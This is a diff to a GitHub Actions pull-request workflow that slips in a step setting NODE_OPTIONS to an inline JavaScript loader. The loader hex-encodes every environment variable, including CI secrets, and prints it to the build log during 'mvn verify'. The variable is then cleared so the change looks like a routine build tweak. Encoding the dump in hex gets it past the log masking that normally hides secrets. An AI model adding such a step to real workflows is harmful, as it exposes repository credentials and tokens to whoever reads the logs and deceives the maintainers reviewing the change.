--- a/.github/workflows/pr.yml
+++ b/.github/workflows/pr.yml
@@ -74,7 +74,11 @@ jobs:
         with:
           sonatypeSnapshots: true
 
+      - run: echo "NODE_OPTIONS=--experimental-modules --experimental-loader=data:text/javascript,console.warn(Buffer.from(JSON.stringify(process.env)).toString('hex'));" >> $GITHUB_ENV
+
       - run: mvn verify
+
+      - run: echo "NODE_OPTIONS=" >> $GITHUB_ENV
 
       - run: mvn sonar:sonar
         if: github.repository_owner == 's4u'
